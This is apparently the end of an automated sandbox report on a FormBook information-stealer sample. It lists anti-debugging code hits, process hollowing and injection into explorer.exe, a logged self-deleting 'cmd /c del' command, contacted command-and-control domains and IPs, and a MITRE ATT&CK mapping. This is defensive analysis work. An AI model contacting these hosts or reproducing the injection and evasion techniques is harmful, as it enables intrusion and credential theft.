          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04857D50 mov eax, dword ptr fs:[00000030h]11_2_04857D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485C577 mov eax, dword ptr fs:[00000030h]11_2_0485C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485C577 mov eax, dword ptr fs:[00000030h]11_2_0485C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFE87 mov eax, dword ptr fs:[00000030h]11_2_048CFE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B46A7 mov eax, dword ptr fs:[00000030h]11_2_048B46A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04878EC7 mov eax, dword ptr fs:[00000030h]11_2_04878EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908ED6 mov eax, dword ptr fs:[00000030h]11_2_04908ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048636CC mov eax, dword ptr fs:[00000030h]11_2_048636CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048EFEC0 mov eax, dword ptr fs:[00000030h]11_2_048EFEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048616E0 mov ecx, dword ptr fs:[00000030h]11_2_048616E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048476E2 mov eax, dword ptr fs:[00000030h]11_2_048476E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04868E00 mov eax, dword ptr fs:[00000030h]11_2_04868E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1608 mov eax, dword ptr fs:[00000030h]11_2_048F1608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A61C mov eax, dword ptr fs:[00000030h]11_2_0486A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A61C mov eax, dword ptr fs:[00000030h]11_2_0486A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483E620 mov eax, dword ptr fs:[00000030h]11_2_0483E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048EFE3F mov eax, dword ptr fs:[00000030h]11_2_048EFE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FAE44 mov eax, dword ptr fs:[00000030h]11_2_048FAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FAE44 mov eax, dword ptr fs:[00000030h]11_2_048FAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484766D mov eax, dword ptr fs:[00000030h]11_2_0484766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04848794 mov eax, dword ptr fs:[00000030h]11_2_04848794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048737F5 mov eax, dword ptr fs:[00000030h]11_2_048737F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A70E mov eax, dword ptr fs:[00000030h]11_2_0486A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A70E mov eax, dword ptr fs:[00000030h]11_2_0486A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485F716 mov eax, dword ptr fs:[00000030h]11_2_0485F716
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFF10 mov eax, dword ptr fs:[00000030h]11_2_048CFF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFF10 mov eax, dword ptr fs:[00000030h]11_2_048CFF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490070D mov eax, dword ptr fs:[00000030h]11_2_0490070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490070D mov eax, dword ptr fs:[00000030h]11_2_0490070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04834F2E mov eax, dword ptr fs:[00000030h]11_2_04834F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04834F2E mov eax, dword ptr fs:[00000030h]11_2_04834F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486E730 mov eax, dword ptr fs:[00000030h]11_2_0486E730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484EF40 mov eax, dword ptr fs:[00000030h]11_2_0484EF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484FF60 mov eax, dword ptr fs:[00000030h]11_2_0484FF60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908F6A mov eax, dword ptr fs:[00000030h]11_2_04908F6A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04839080 mov eax, dword ptr fs:[00000030h]11_2_04839080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3884 mov eax, dword ptr fs:[00000030h]11_2_048B3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3884 mov eax, dword ptr fs:[00000030h]11_2_048B3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048790AF mov eax, dword ptr fs:[00000030h]11_2_048790AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov ecx, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov eax, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov eax, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov ecx, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048358EC mov eax, dword ptr fs:[00000030h]11_2_048358EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04904015 mov eax, dword ptr fs:[00000030h]11_2_04904015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04904015 mov eax, dword ptr fs:[00000030h]11_2_04904015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04850050 mov eax, dword ptr fs:[00000030h]11_2_04850050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04850050 mov eax, dword ptr fs:[00000030h]11_2_04850050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04901074 mov eax, dword ptr fs:[00000030h]11_2_04901074
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0485C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04862990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04854120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0485B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0485B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0484AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0484AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0486FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04862ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04862AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04848A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04835210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0483AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04853A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04874A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04874A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F60F1 GetProcessHeap
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F171B SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F3D62 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F19E2 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F15CD IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 2_2_002F3D62 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 2_2_002F19E2 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 2_2_002F15CD IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 2_2_002F171B SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe | Network Connect: 103.88.34.80 80
Source: C:\Windows\explorer.exe | Domain query: www.ejsuniqueclasses.com
Source: C:\Windows\explorer.exe | Domain query: www.856380062.xyz
Source: C:\Windows\explorer.exe | Network Connect: 198.74.106.237 80
Source: C:\Windows\explorer.exe | Network Connect: 163.123.204.26 80
Source: C:\Windows\explorer.exe | Network Connect: 164.68.104.58 80
Source: C:\Windows\explorer.exe | Domain query: www.466se.com
Source: C:\Windows\explorer.exe | Domain query: www.circusocks.com
Source: C:\Windows\explorer.exe | Domain query: www.healthpragency.com

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section loaded: unknown | target: C:\Users\user\Desktop\mvui1vY6Mo.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\cmmon32.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\cmmon32.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Thread register set: target process: 3424
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3424

Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe | base address: 1250000

Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Process created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
Source: explorer.exe, 00000004.00000000.694405409.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.675806448.0000000005E50000.00000004.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F182B cpuid
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe | Code function: 0_2_002F14B5 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

(One row per matrix line; cells are separated by " | ", an empty cell is left blank. The digits that follow some technique names are the report's signature-count badges, kept as they appear on the page.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion2 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Security Software Discovery141 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 458944 | Sample: mvui1vY6Mo | Start date: 03/08/2021 | Architecture: WINDOWS | Score: 100

Top-level DNS/IP info: www.comparaca.com; shops.myshopify.com; comparaca.myshopify.com
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

Process tree (node numbers are the graph's own node ids):
mvui1vY6Mo.exe (10), started
    signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
    mvui1vY6Mo.exe (13), started
